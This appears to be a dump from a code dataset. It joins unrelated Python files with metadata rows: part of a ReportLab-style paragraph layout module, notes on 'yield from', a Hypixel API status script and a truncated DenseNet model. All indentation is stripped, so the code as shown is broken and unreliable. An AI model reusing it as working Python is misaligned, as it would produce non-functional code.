s = int(availHeight / l)
height = s * l
n = len(lines)
allowWidows = getattr(self, 'allowWidows', getattr(self, 'allowWidows', 1))
allowOrphans = getattr(self, 'allowOrphans', getattr(self, 'allowOrphans', 0))
if not allowOrphans:
if s <= 1: # orphan?
del self.blPara
return []
if n <= s: return [self]
if not allowWidows:
if n == s + 1: # widow?
if (allowOrphans and n == 3) or n > 3:
s -= 1 # give the widow some company
else:
del self.blPara # no room for adjustment; force the whole para onwards
return []
func = self._get_split_blParaFunc()
P1 = self.__class__(None, style, bulletText=self.bulletText, frags=func(blPara, 0, s))
#this is a major hack
P1.blPara = ParaLines(kind=1, lines=blPara.lines[0:s], aH=availHeight, aW=availWidth)
P1._JustifyLast = 1
P1._splitpara = 1
P1.height = height
P1.width = availWidth
if style.firstLineIndent != 0:
style = deepcopy(style)
style.firstLineIndent = 0
P2 = self.__class__(None, style, bulletText=None, frags=func(blPara, s, n))
for a in ('autoLeading', # possible attributes that might be directly on self.
):
if hasattr(self, a):
setattr(P1, a, getattr(self, a))
setattr(P2, a, getattr(self, a))
return [P1, P2]
def draw(self):
#call another method for historical reasons. Besides, I
#suspect I will be playing with alternate drawing routines
#so not doing it here makes it easier to switch.
self.drawPara(self.debug)
def breakLines(self, width):
"""
Returns a broken line structure. There are two cases
A) For the simple case of a single formatting input fragment the output is
A fragment specifier with
- kind = 0
- fontName, fontSize, leading, textColor
- lines= A list of lines
Each line has two items.
1. unused width in points
2. word list
B) When there is more than one input formatting fragment the output is
A fragment specifier with
- kind = 1
- lines= A list of fragments each having fields
- extraspace (needed for justified)
- fontSize
- words=word list
each word is itself a fragment with
various settings
This structure can be used to easily draw paragraphs with the various alignments.
You can supply either a single width or a list of widths; the latter will have its
last item repeated until necessary. A 2-element list is useful when there is a
different first line indent; a longer list could be created to facilitate custom wraps
around irregular objects.
"""
if self.debug:
print id(self), "breakLines"
if not isinstance(width, (tuple, list)):
maxWidths = [width]
else:
maxWidths = width
lines = []
lineno = 0
style = self.style
#for bullets, work out width and ensure we wrap the right amount onto line one
_handleBulletWidth(self.bulletText, style, maxWidths)
maxWidth = maxWidths[0]
self.height = 0
autoLeading = getattr(self, 'autoLeading', getattr(style, 'autoLeading', ''))
calcBounds = autoLeading not in ('', 'off')
frags = self.frags
nFrags = len(frags)
if nFrags == 1 and not hasattr(frags[0], 'cbDefn'):
f = frags[0]
fontSize = f.fontSize
fontName = f.fontName
ascent, descent = getAscentDescent(fontName, fontSize)
words = hasattr(f, 'text') and split(f.text, ' ') or f.words
spaceWidth = stringWidth(' ', fontName, fontSize, self.encoding)
cLine = []
currentWidth = -spaceWidth # hack to get around extra space for word 1
for word in words:
#this underscores my feeling that Unicode throughout would be easier!
wordWidth = stringWidth(word, fontName, fontSize, self.encoding)
newWidth = currentWidth + spaceWidth + wordWidth
if newWidth <= maxWidth or not len(cLine):
# fit one more on this line
cLine.append(word)
currentWidth = newWidth
else:
if currentWidth > self.width: self.width = currentWidth
#end of line
lines.append((maxWidth - currentWidth, cLine))
cLine = [word]
currentWidth = wordWidth
lineno += 1
try:
maxWidth = maxWidths[lineno]
except IndexError:
maxWidth = maxWidths[-1] # use the last one
#deal with any leftovers on the final line
if cLine != []:
if currentWidth > self.width: self.width = currentWidth
lines.append((maxWidth - currentWidth, cLine))
return f.clone(kind=0, lines=lines, ascent=ascent, descent=descent, fontSize=fontSize)
elif nFrags <= 0:
return ParaLines(kind=0, fontSize=style.fontSize, fontName=style.fontName,
textColor=style.textColor, ascent=style.fontSize, descent=-0.2 * style.fontSize,
lines=[])
else:
if hasattr(self, 'blPara') and getattr(self, '_splitpara', 0):
#NB this is an utter hack that awaits the proper information
#preserving splitting algorithm
return self.blPara
n = 0
words = []
for w in _getFragWords(frags):
f = w[-1][0]
fontName = f.fontName
fontSize = f.fontSize
spaceWidth = stringWidth(' ', fontName, fontSize)
if not words:
currentWidth = -spaceWidth # hack to get around extra space for word 1
maxSize = fontSize
maxAscent, minDescent = getAscentDescent(fontName, fontSize)
wordWidth = w[0]
f = w[1][0]
if wordWidth > 0:
newWidth = currentWidth + spaceWidth + wordWidth
else:
newWidth = currentWidth
#test to see if this frag is a line break. If it is we will only act on it
#if the current width is non-negative or the previous thing was a deliberate lineBreak
lineBreak = hasattr(f, 'lineBreak')
endLine = (newWidth > maxWidth and n > 0) or lineBreak
if not endLine:
if lineBreak: continue #throw it away
nText = w[1][1]
if nText: n += 1
fontSize = f.fontSize
if calcBounds:
cbDefn = getattr(f, 'cbDefn', None)
if getattr(cbDefn, 'width', 0):
descent, ascent = imgVRange(cbDefn.height, cbDefn.valign, fontSize)
else:
ascent, descent = getAscentDescent(f.fontName, fontSize)
else:
ascent, descent = getAscentDescent(f.fontName, fontSize)
maxSize = max(maxSize, fontSize)
maxAscent = max(maxAscent, ascent)
minDescent = min(minDescent, descent)
if not words:
g = f.clone()
words = [g]
g.text = nText
elif not _sameFrag(g, f):
if currentWidth > 0 and ((nText != '' and nText[0] != ' ') or hasattr(f, 'cbDefn')):
if hasattr(g, 'cbDefn'):
i = len(words) - 1
while i >= 0:
wi = words[i]
cbDefn = getattr(wi, 'cbDefn', None)
if cbDefn:
if not getattr(cbDefn, 'width', 0):
i -= 1
continue
if not wi.text.endswith(' '):
wi.text += ' '
break
else:
if not g.text.endswith(' '):
g.text += ' '
g = f.clone()
words.append(g)
g.text = nText
else:
if nText != '' and nText[0] != ' ':
g.text += ' ' + nText
for i in w[2:]:
g = i[0].clone()
g.text = i[1]
words.append(g)
fontSize = g.fontSize
if calcBounds:
cbDefn = getattr(g, 'cbDefn', None)
if getattr(cbDefn, 'width', 0):
descent, ascent = imgVRange(cbDefn.height, cbDefn.valign, fontSize)
else:
ascent, descent = getAscentDescent(g.fontName, fontSize)
else:
ascent, descent = getAscentDescent(g.fontName, fontSize)
maxSize = max(maxSize, fontSize)
maxAscent = max(maxAscent, ascent)
minDescent = min(minDescent, descent)
currentWidth = newWidth
else: # either it won't fit, or it's a lineBreak tag
if lineBreak:
g = f.clone()
words.append(g)
if currentWidth > self.width: self.width = currentWidth
#end of line
lines.append(FragLine(extraSpace=maxWidth - currentWidth, wordCount=n,
lineBreak=lineBreak, words=words, fontSize=maxSize, ascent=maxAscent,
descent=minDescent))
#start new line
lineno += 1
try:
maxWidth = maxWidths[lineno]
except IndexError:
maxWidth = maxWidths[-1] # use the last one
if lineBreak:
n = 0
words = []
continue
currentWidth = wordWidth
n = 1
g = f.clone()
maxSize = g.fontSize
if calcBounds:
cbDefn = getattr(g, 'cbDefn', None)
if getattr(cbDefn, 'width', 0):
minDescent, maxAscent = imgVRange(cbDefn.height, cbDefn.valign, maxSize)
else:
maxAscent, minDescent = getAscentDescent(g.fontName, maxSize)
else:
maxAscent, minDescent = getAscentDescent(g.fontName, maxSize)
words = [g]
g.text = w[1][1]
for i in w[2:]:
g = i[0].clone()
g.text = i[1]
words.append(g)
fontSize = g.fontSize
if calcBounds:
cbDefn = getattr(g, 'cbDefn', None)
if getattr(cbDefn, 'width', 0):
descent, ascent = imgVRange(cbDefn.height, cbDefn.valign, fontSize)
else:
ascent, descent = getAscentDescent(g.fontName, fontSize)
else:
ascent, descent = getAscentDescent(g.fontName, fontSize)
maxSize = max(maxSize, fontSize)
maxAscent = max(maxAscent, ascent)
minDescent = min(minDescent, descent)
#deal with any leftovers on the final line
if words != []:
if currentWidth > self.width: self.width = currentWidth
lines.append(ParaLines(extraSpace=(maxWidth - currentWidth), wordCount=n,
words=words, fontSize=maxSize, ascent=maxAscent, descent=minDescent))
return ParaLines(kind=1, lines=lines)
return lines
def breakLinesCJK(self, width):
"""Initially, the dumbest possible wrapping algorithm.
Cannot handle font variations."""
if self.debug:
print id(self), "breakLinesCJK"
if not isinstance(width, (list, tuple)):
maxWidths = [width]
else:
maxWidths = width
style = self.style
#for bullets, work out width and ensure we wrap the right amount onto line one
_handleBulletWidth(self.bulletText, style, maxWidths)
if len(self.frags) > 1:
autoLeading = getattr(self, 'autoLeading', getattr(style, 'autoLeading', ''))
calcBounds = autoLeading not in ('', 'off')
return cjkFragSplit(self.frags, maxWidths, calcBounds, self.encoding)
elif not len(self.frags):
return ParaLines(kind=0, fontSize=style.fontSize, fontName=style.fontName,
textColor=style.textColor, lines=[], ascent=style.fontSize, descent=-0.2 * style.fontSize)
f = self.frags[0]
if 1 and hasattr(self, 'blPara') and getattr(self, '_splitpara', 0):
#NB this is an utter hack that awaits the proper information
#preserving splitting algorithm
return f.clone(kind=0, lines=self.blPara.lines)
lines = []
lineno = 0
self.height = 0
f = self.frags[0]
if hasattr(f, 'text'):
text = f.text
else:
text = ''.join(getattr(f, 'words', []))
from reportlab.lib.textsplit import wordSplit
lines = wordSplit(text, maxWidths[0], f.fontName, f.fontSize)
#the paragraph drawing routine assumes multiple frags per line, so we need an
#extra list like this
# [space, [text]]
#
wrappedLines = [(sp, [line]) for (sp, line) in lines]
return f.clone(kind=0, lines=wrappedLines, ascent=f.fontSize, descent=-0.2 * f.fontSize)
def beginText(self, x, y):
return self.canv.beginText(x, y)
def drawPara(self, debug=0):
"""Draws a paragraph according to the given style.
Returns the final y position at the bottom. Not safe for
paragraphs without spaces e.g. Japanese; wrapping
algorithm will go infinite."""
if self.debug:
print id(self), "drawPara", self.blPara.kind
#stash the key facts locally for speed
canvas = self.canv
style = self.style
blPara = self.blPara
lines = blPara.lines
leading = style.leading
autoLeading = getattr(self, 'autoLeading', getattr(style, 'autoLeading', ''))
#work out the origin for line 1
leftIndent = style.leftIndent
cur_x = leftIndent
if debug:
bw = 0.5
bc = Color(1, 1, 0)
bg = Color(0.9, 0.9, 0.9)
else:
bw = getattr(style, 'borderWidth', None)
bc = getattr(style, 'borderColor', None)
bg = style.backColor
#if has a background or border, draw it
if bg or (bc and bw):
canvas.saveState()
op = canvas.rect
kwds = dict(fill=0, stroke=0)
if bc and bw:
canvas.setStrokeColor(bc)
canvas.setLineWidth(bw)
kwds['stroke'] = 1
br = getattr(style, 'borderRadius', 0)
if br and not debug:
op = canvas.roundRect
kwds['radius'] = br
if bg:
canvas.setFillColor(bg)
kwds['fill'] = 1
bp = getattr(style, 'borderPadding', 0)
op(leftIndent - bp,
-bp,
self.width - (leftIndent + style.rightIndent) + 2 * bp,
self.height + 2 * bp,
**kwds)
canvas.restoreState()
nLines = len(lines)
bulletText = self.bulletText
if nLines > 0:
_offsets = getattr(self, '_offsets', [0])
_offsets += (nLines - len(_offsets)) * [_offsets[-1]]
canvas.saveState()
alignment = style.alignment
offset = style.firstLineIndent + _offsets[0]
lim = nLines - 1
noJustifyLast = not (hasattr(self, '_JustifyLast') and self._JustifyLast)
if blPara.kind == 0:
if alignment == TA_LEFT:
dpl = _leftDrawParaLine
elif alignment == TA_CENTER:
dpl = _centerDrawParaLine
elif self.style.alignment == TA_RIGHT:
dpl = _rightDrawParaLine
elif self.style.alignment == TA_JUSTIFY:
dpl = _justifyDrawParaLine
f = blPara
cur_y = self.height - getattr(f, 'ascent', f.fontSize) # TODO fix XPreformatted to remove this hack
if bulletText:
offset = _drawBullet(canvas, offset, cur_y, bulletText, style)
#set up the font etc.
canvas.setFillColor(f.textColor)
tx = self.beginText(cur_x, cur_y)
if autoLeading == 'max':
leading = max(leading, LEADING_FACTOR * f.fontSize)
elif autoLeading == 'min':
leading = LEADING_FACTOR * f.fontSize
#now the font for the rest of the paragraph
tx.setFont(f.fontName, f.fontSize, leading)
ws = getattr(tx, '_wordSpace', 0)
t_off = dpl(tx, offset, ws, lines[0][1], noJustifyLast and nLines == 1)
if f.underline or f.link or f.strike:
xs = tx.XtraState = ABag()
xs.cur_y = cur_y
xs.f = f
xs.style = style
xs.lines = lines
xs.underlines = []
xs.underlineColor = None
# XXX Modified for XHTML2PDF
xs.backgrounds = []
xs.backgroundColor = None
xs.backgroundFontSize = None
xs.strikes = []
xs.strikeColor = None
# XXX Modified for XHTML2PDF
xs.strikeFontSize = None
xs.links = []
xs.link = f.link
canvas.setStrokeColor(f.textColor)
dx = t_off + leftIndent
if dpl != _justifyDrawParaLine: ws = 0
# XXX Never underline!
underline = f.underline
strike = f.strike
link = f.link
if underline:
_do_under_line(0, dx, ws, tx)
if strike:
_do_under_line(0, dx, ws, tx, lm=0.125)
if link: _do_link_line(0, dx, ws, tx)
#now the middle of the paragraph, aligned with the left margin which is our origin.
for i in xrange(1, nLines):
ws = lines[i][0]
t_off = dpl(tx, _offsets[i], ws, lines[i][1], noJustifyLast and i == lim)
if dpl != _justifyDrawParaLine: ws = 0
if underline: _do_under_line(i, t_off + leftIndent, ws, tx)
if strike: _do_under_line(i, t_off + leftIndent, ws, tx, lm=0.125)
if link: _do_link_line(i, t_off + leftIndent, ws, tx)
else:
for i in xrange(1, nLines):
dpl(tx, _offsets[i], lines[i][0], lines[i][1], noJustifyLast and i == lim)
else:
f = lines[0]
cur_y = self.height - getattr(f, 'ascent', f.fontSize) # TODO fix XPreformatted to remove this hack
# default?
dpl = _leftDrawParaLineX
if bulletText:
oo = offset
offset = _drawBullet(canvas, offset, cur_y, bulletText, style)
if alignment == TA_LEFT:
dpl = _leftDrawParaLineX
elif alignment == TA_CENTER:
dpl = _centerDrawParaLineX
elif self.style.alignment == TA_RIGHT:
dpl = _rightDrawParaLineX
elif self.style.alignment == TA_JUSTIFY:
dpl = _justifyDrawParaLineX
else:
raise ValueError("bad align %s" % repr(alignment))
#set up the font etc.
tx = self.beginText(cur_x, cur_y)
xs = tx.XtraState = ABag()
xs.textColor = None
# XXX Modified for XHTML2PDF
xs.backColor = None
xs.rise = 0
xs.underline = 0
xs.underlines = []
xs.underlineColor = None
# XXX Modified for XHTML2PDF
xs.background = 0
xs.backgrounds = []
xs.backgroundColor = None
xs.backgroundFontSize = None
xs.strike = 0
xs.strikes = []
xs.strikeColor = None
# XXX Modified for XHTML2PDF
xs.strikeFontSize = None
xs.links = []
xs.link = None
xs.leading = style.leading
xs.leftIndent = leftIndent
tx._leading = None
tx._olb = None
xs.cur_y = cur_y
xs.f = f
xs.style = style
xs.autoLeading = autoLeading
tx._fontname, tx._fontsize = None, None
dpl(tx, offset, lines[0], noJustifyLast and nLines == 1)
_do_post_text(tx)
#now the middle of the paragraph, aligned with the left margin which is our origin.
for i in xrange(1, nLines):
f = lines[i]
dpl(tx, _offsets[i], f, noJustifyLast and i == lim)
_do_post_text(tx)
canvas.drawText(tx)
canvas.restoreState()
def getPlainText(self, identify=None):
"""
Convenience function for templates which want access
to the raw text, without XML tags.
"""
frags = getattr(self, 'frags', None)
if frags:
plains = []
for frag in frags:
if hasattr(frag, 'text'):
plains.append(frag.text)
return join(plains, '')
elif identify:
text = getattr(self, 'text', None)
if text is None: text = repr(self)
return text
else:
return ''
def getActualLineWidths0(self):
"""
Convenience function; tells you how wide each line
actually is. For justified styles, this will be
the same as the wrap width; for others it might be
useful for seeing if paragraphs will fit in spaces.
"""
assert hasattr(self, 'width'), "Cannot call this method before wrap()"
if self.blPara.kind:
func = lambda frag, w=self.width: w - frag.extraSpace
else:
func = lambda frag, w=self.width: w - frag[0]
return map(func, self.blPara.lines)
if __name__ == '__main__': # NORUNTESTS
def dumpParagraphLines(P):
print 'dumpParagraphLines(<Paragraph @ %d>)' % id(P)
lines = P.blPara.lines
for l, line in enumerate(lines):
line = lines[l]
if hasattr(line, 'words'):
words = line.words
else:
words = line[1]
nwords = len(words)
print 'line%d: %d(%s)\n ' % (l, nwords, str(getattr(line, 'wordCount', 'Unknown'))),
for w in xrange(nwords):
print "%d:'%s'" % (w, getattr(words[w], 'text', words[w])),
print
def fragDump(w):
R = ["'%s'" % w[1]]
for a in ('fontName', 'fontSize', 'textColor', 'rise', 'underline', 'strike', 'link', 'cbDefn', 'lineBreak'):
if hasattr(w[0], a):
R.append('%s=%r' % (a, getattr(w[0], a)))
return ', '.join(R)
def dumpParagraphFrags(P):
print 'dumpParagraphFrags(<Paragraph @ %d>) minWidth() = %.2f' % (id(P), P.minWidth())
frags = P.frags
n = len(frags)
for l in xrange(n):
print "frag%d: '%s' %s" % (
l, frags[l].text, ' '.join(['%s=%s' % (k, getattr(frags[l], k)) for k in frags[l].__dict__ if k != text]))
l = 0
cum = 0
for W in _getFragWords(frags):
cum += W[0]
print "fragword%d: cum=%3d size=%d" % (l, cum, W[0]),
for w in W[1:]:
print '(%s)' % fragDump(w),
print
l += 1
from reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle
from reportlab.lib.units import cm
import sys
TESTS = sys.argv[1:]
if TESTS == []:
TESTS = ['4']
def flagged(i, TESTS=TESTS):
return 'all' in TESTS or '*' in TESTS or str(i) in TESTS
styleSheet = getSampleStyleSheet()
B = styleSheet['BodyText']
style = ParagraphStyle("discussiontext", parent=B)
style.fontName = 'Helvetica'
if flagged(1):
text = '''The <font name=courier color=green>CMYK</font> or subtractive method follows the way a printer
mixes three pigments (cyan, magenta, and yellow) to form colors.
Because mixing chemicals is more difficult than combining light there
is a fourth parameter for darkness. For example a chemical
combination of the <font name=courier color=green>CMY</font> pigments generally never makes a perfect
black -- instead producing a muddy color -- so, to get black printers
don't use the <font name=courier color=green>CMY</font> pigments but use a direct black ink. Because
<font name=courier color=green>CMYK</font> maps more directly to the way printer hardware works it may
be the case that &| & | colors specified in <font name=courier color=green>CMYK</font> will provide better fidelity
and better control when printed.
'''
P = Paragraph(text, style)
dumpParagraphFrags(P)
aW, aH = 456.0, 42.8
w, h = P.wrap(aW, aH)
dumpParagraphLines(P)
S = P.split(aW, aH)
for s in S:
s.wrap(aW, aH)
dumpParagraphLines(s)
aH = 500
if flagged(2):
P = Paragraph("""Price<super><font color="red">*</font></super>""", styleSheet['Normal'])
dumpParagraphFrags(P)
w, h = P.wrap(24, 200)
dumpParagraphLines(P)
if flagged(3):
text = """Dieses Kapitel bietet eine schnelle <b><font color=red>Programme :: starten</font></b>
<onDraw name=myIndex label="Programme :: starten">
<b><font color=red>Eingabeaufforderung :: (>>>)</font></b>
<onDraw name=myIndex label="Eingabeaufforderung :: (>>>)">
<b><font color=red>>>> (Eingabeaufforderung)</font></b>
<onDraw name=myIndex label=">>> (Eingabeaufforderung)">
Einführung in Python <b><font color=red>Python :: Einführung</font></b>
<onDraw name=myIndex label="Python :: Einführung">.
Das Ziel ist, die grundlegenden Eigenschaften von Python darzustellen, ohne
sich zu sehr in speziellen Regeln oder Details zu verstricken. Dazu behandelt
dieses Kapitel kurz die wesentlichen Konzepte wie Variablen, Ausdrücke,
Kontrollfluss, Funktionen sowie Ein- und Ausgabe. Es erhebt nicht den Anspruch,
umfassend zu sein."""
P = Paragraph(text, styleSheet['Code'])
dumpParagraphFrags(P)
w, h = P.wrap(6 * 72, 9.7 * 72)
dumpParagraphLines(P)
if flagged(4):
text = '''Die eingebaute Funktion <font name=Courier>range(i, j [, stride])</font><onDraw name=myIndex label="eingebaute Funktionen::range()"><onDraw name=myIndex label="range() (Funktion)"><onDraw name=myIndex label="Funktionen::range()"> erzeugt eine Liste von Ganzzahlen und füllt sie mit Werten <font name=Courier>k</font>, für die gilt: <font name=Courier>i <= k < j</font>. Man kann auch eine optionale Schrittweite angeben. Die eingebaute Funktion <font name=Courier>xrange()</font><onDraw name=myIndex label="eingebaute Funktionen::xrange()"><onDraw name=myIndex label="xrange() (Funktion)"><onDraw name=myIndex label="Funktionen::xrange()"> erfüllt einen ähnlichen Zweck, gibt aber eine unveränderliche Sequenz vom Typ <font name=Courier>XRangeType</font><onDraw name=myIndex label="XRangeType"> zurück. Anstatt alle Werte in der Liste abzuspeichern, berechnet diese Liste ihre Werte, wann immer sie angefordert werden. Das ist sehr viel speicherschonender, wenn mit sehr langen Listen von Ganzzahlen gearbeitet wird. <font name=Courier>XRangeType</font> kennt eine einzige Methode, <font name=Courier>s.tolist()</font><onDraw name=myIndex label="XRangeType::tolist() (Methode)"><onDraw name=myIndex label="s.tolist() (Methode)"><onDraw name=myIndex label="Methoden::s.tolist()">, die seine Werte in eine Liste umwandelt.'''
aW = 420
aH = 64.4
P = Paragraph(text, B)
dumpParagraphFrags(P)
w, h = P.wrap(aW, aH)
print 'After initial wrap', w, h
dumpParagraphLines(P)
S = P.split(aW, aH)
dumpParagraphFrags(S[0])
w0, h0 = S[0].wrap(aW, aH)
print 'After split wrap', w0, h0
dumpParagraphLines(S[0])
if flagged(5):
text = '<para> %s <![CDATA[</font></b>& %s < >]]></para>' % (chr(163), chr(163))
P = Paragraph(text, styleSheet['Code'])
dumpParagraphFrags(P)
w, h = P.wrap(6 * 72, 9.7 * 72)
dumpParagraphLines(P)
if flagged(6):
for text in [
'''Here comes <FONT FACE="Helvetica" SIZE="14pt">Helvetica 14</FONT> with <STRONG>strong</STRONG> <EM>emphasis</EM>.''',
'''Here comes <font face="Helvetica" size="14pt">Helvetica 14</font> with <Strong>strong</Strong> <em>emphasis</em>.''',
'''Here comes <font face="Courier" size="3cm">Courier 3cm</font> and normal again.''',
]:
P = Paragraph(text, styleSheet['Normal'], caseSensitive=0)
dumpParagraphFrags(P)
w, h = P.wrap(6 * 72, 9.7 * 72)
dumpParagraphLines(P)
if flagged(7):
text = """<para align="CENTER" fontSize="24" leading="30"><b>Generated by:</b>Dilbert</para>"""
P = Paragraph(text, styleSheet['Code'])
dumpParagraphFrags(P)
w, h = P.wrap(6 * 72, 9.7 * 72)
dumpParagraphLines(P)
if flagged(8):
text = """- bullet 0<br/>- bullet 1<br/>- bullet 2<br/>- bullet 3<br/>- bullet 4<br/>- bullet 5"""
P = Paragraph(text, styleSheet['Normal'])
dumpParagraphFrags(P)
w, h = P.wrap(6 * 72, 9.7 * 72)
dumpParagraphLines(P)
S = P.split(6 * 72, h / 2.0)
print len(S)
dumpParagraphLines(S[0])
dumpParagraphLines(S[1])
if flagged(9):
text = """Furthermore, the fundamental error of
regarding <img src="../docs/images/testimg.gif" width="3" height="7"/> functional notions as
categorial delimits a general
convention regarding the forms of the<br/>
grammar. I suggested that these results
would follow from the assumption that"""
P = Paragraph(text, ParagraphStyle('aaa', parent=styleSheet['Normal'], align=TA_JUSTIFY))
dumpParagraphFrags(P)
w, h = P.wrap(6 * cm - 12, 9.7 * 72)
dumpParagraphLines(P)
if flagged(10):
text = """a b c\xc2\xa0d e f"""
P = Paragraph(text, ParagraphStyle('aaa', parent=styleSheet['Normal'], align=TA_JUSTIFY))
dumpParagraphFrags(P)
w, h = P.wrap(6 * cm - 12, 9.7 * 72)
dumpParagraphLines(P)
| [
"[email protected]"
]
| |
d1878d336619c62c219f42222f728c8e4ed65c83 | 7d768b5be4213c3ac90648d48d1a322fb8c5c433 | /python_code/chuanzhi/python_advance/19/process_pool.py | e42b0da91f0fd4f73e665517b8f08d73f03c0eeb | []
| no_license | googleliyang/gitbook_cz_python | 7da5070b09e760d5e099aeae468c08e705b7da78 | c82b7d435dc11016e24cde2bdc4a558f507cb668 | refs/heads/master | 2020-04-02T17:47:58.400424 | 2018-12-22T09:48:59 | 2018-12-22T09:48:59 | 154,672,309 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 111 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @File : process_pool.py
# @Author: ly
# @Date : 2018/12/8
| [
"[email protected]"
]
| |
65757a625f7f8aafc159219b1ac837edf8deab90 | a251f675c1083e857d9f612a3bef9c6745d6b1b9 | /chapter12_async_IO_coroutine/yield_from_how.py | 45e7a864accdeeb55778cd38383ed8bfe7a2f6fa | []
| no_license | haokr/PythonProgramming_Advanced | 6319e5bb4a82944c11d83e1095e2aa37cb217bd9 | 472da8407828f53be3cc3d1153ac9b795f6a9a45 | refs/heads/master | 2022-04-01T22:02:10.364678 | 2020-02-09T08:07:55 | 2020-02-09T08:07:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,304 | py | # -*- coding: utf-8 -*-
'''
* @Author: WangHao
* @Date: 2020-01-12 09:47:40
* @LastEditors: WangHao
* @LastEditTime: 2020-01-12 10:07:08
* @Description: None
'''
'''
总结:
1. 子生成器生产的值,都是直接传给调用方:调用方通过.send()发送的值都是直接传给子生成器的,如果发送的是None,会调用子生成器的__next__()方法,如果不是None,调用子生成器的send()方法。
2. 子生成器退出的时候,最后的return EXPR,会触发一个StopIteration(EXPR)异常;
3. yield from表达式的值,是子生成器终止时,传递给StopIteration异常的第一个参数;
4. 如果调用的时候出现StopIteration异常,委托生成器也会恢复运行,同时其他的异常会向上冒泡;
5. 传入委托生成器的异常里,除了GeneratorExit之外,其他的所有异常全都传递给子生成器的throw()方法,如果调用throw的时候出现了StopIteration异常,那么就恢复委托生成器的运行,其他的异常全部向上冒泡;
6. 如果在委托生成器上调用close()或传入GeneratorExit异常,会调用子生成器的close()方法,没有的话不调用,如果在调用的时候出现异常那么就向上冒泡,否则的话委托生成器会抛出GeneratorExit异常。
''' | [
"[email protected]"
]
| |
83319329ae3deb480ae7390407f2049fa217f9a8 | 03d29ea4bc9a0e302d6000947b5d70b17ebfdec5 | /games/hipixel.py | 75a9f1a40f443db7829006ae08d5b8ccc5799813 | []
| no_license | Tim232/GameWatcherBot | 0abc05657b5768db18c78ecbe8c9bee89169145e | aa60c0997928ea26d63b770d1dd55b208529f80f | refs/heads/main | 2023-03-04T13:52:27.690345 | 2021-02-16T12:31:39 | 2021-02-16T12:31:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 584 | py | import requests
import json
import os
import sys
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
#import bot
key, player_uuid = '', ''
with open('../settings.json', 'r') as f:
hipixel_settings = json.load(f)["hipixel"]
key = hipixel_settings["key"]
player_uuid = hipixel_settings["player_uuid"]
url = 'https://api.hypixel.net/status?key=' + key + '&uuid=' + player_uuid
html = requests.get(url)
result = json.loads(html.text)
#bot.client.get_channel(channel_id)
if result['session']['online']: print('온라인')
else: print('오프라인') | [
"[email protected]"
]
| |
8bfa5c02a3089abb03156a6609bfed1a989474e9 | d5f8ca3c13f681d147b7614f1902df7ba34e06f9 | /Graduate/model/densenet.py | 38359413ab29892a7c8f412c5fc1741039a65696 | []
| no_license | hhjung1202/OwnAdaptation | 29a6c0a603ab9233baf293096fb9e7e956647a10 | 50805730254419f090f4854387be79648a01fbb4 | refs/heads/master | 2021-06-25T22:31:15.437642 | 2020-11-26T18:19:55 | 2020-11-26T18:19:55 | 176,670,379 | 1 | 0 | null | 2020-06-11T07:35:55 | 2019-03-20T06:36:19 | Python | UTF-8 | Python | false | false | 7,429 | py | import torch
import torch.nn as nn
import torch.nn.functional as F
from collections import OrderedDict
from torch import Tensor
import itertools
class Flatten(nn.Module):
def forward(self, x):
return x.view(x.size(0), -1)
class _Gate_selection(nn.Sequential):
phase = 2
def __init__(self, num_input_features, growth_rate, count, reduction=4):
super(_Gate_selection, self).__init__()
self.actual = (count+1) // 2
LongTensor = torch.cuda.LongTensor if torch.cuda.is_available() else torch.LongTensor
self.init = LongTensor([i for i in range(num_input_features)]).view(1, -1)
s = num_input_features
arr = []
for j in range(count):
arr += [[i for i in range(s, s + growth_rate)]]
s+=growth_rate
self.arr = LongTensor(arr)
self.avg_pool = nn.AdaptiveAvgPool2d(1)
channels = num_input_features + growth_rate * count
self.fc1 = nn.Linear(channels, channels//reduction)
self.relu = nn.ReLU(inplace=True)
self.fc2 = nn.Linear(channels//reduction, count)
self.sigmoid = nn.Sigmoid()
self.flat = Flatten()
def forward(self, x, x_norm):
b, _, w, h = x_norm.size()
out = self.avg_pool(x_norm) # batch, channel 합친거, w, h
out = self.flat(out)
out = self.relu(self.fc1(out))
out = self.sigmoid(self.fc2(out))
_, sort = out.sort()
indices = sort[:,:self.actual] # batch, sort # shuffle
indices = indices[:, torch.randperm(indices.size(1))]
select = self.init.repeat(b,1)
select = torch.cat([select, self.arr[indices].view(b,-1)], 1)
select = select.view(select.size(0), -1, 1, 1).repeat(1,1,w,h)
x = x.gather(1, select)
return x
class _Bottleneck(nn.Sequential):
def __init__(self, num_input_features, growth_rate, count=1):
super(_Bottleneck, self).__init__()
self.norm1 = nn.BatchNorm2d(num_input_features)
self.relu = nn.ReLU(inplace=True)
self.conv1 = nn.Conv2d(num_input_features, 4 * growth_rate,
kernel_size=1, stride=1, bias=False)
self.norm2 = nn.BatchNorm2d(4 * growth_rate)
self.conv2 = nn.Conv2d(4 * growth_rate, growth_rate,
kernel_size=3, stride=1, padding=1, bias=False)
self.count = count
def forward(self, x):
if isinstance(x, Tensor):
x = [x]
out = torch.cat(x,1)
out = self.norm1(out)
out = self.relu(out)
out = self.conv1(out)
out = self.norm2(out)
out = self.relu(out)
out = self.conv2(out)
return out
class _Basic(nn.Sequential):
def __init__(self, num_input_features, growth_rate):
super(_Basic, self).__init__()
self.norm1 = nn.BatchNorm2d(num_input_features)
self.relu = nn.ReLU(inplace=True)
self.conv1 = nn.Conv2d(num_input_features, growth_rate,
kernel_size=3, stride=1, padding=1, bias=False)
self.count = count
def forward(self, x):
if isinstance(x, Tensor):
x = [x]
out = torch.cat(x,1)
out = self.norm1(out)
out = self.relu(out)
out = self.conv1(out)
return out
class _DenseLayer(nn.Module):
def __init__(self, num_input_features, growth_rate, num_layers, Block):
super(_DenseLayer, self).__init__()
self.num_layers = num_layers
self.init_block = Block(num_input_features, growth_rate)
for i in range(1, num_layers):
j = (i-1)//2 + 1
setattr(self, 'layer{}'.format(i), Block(num_input_features + growth_rate * j, growth_rate))
setattr(self, 'norm{}'.format(i), nn.BatchNorm2d(num_input_features + growth_rate * (i+1)))
setattr(self, 'gate{}'.format(i), _Gate_selection(num_input_features, growth_rate, i+1, reduction=4))
def forward(self, x):
out = self.init_block(x)
x = [x] + [out]
out = torch.cat(x,1)
for i in range(1, self.num_layers):
out = getattr(self, 'layer{}'.format(i))(out)
x += [out]
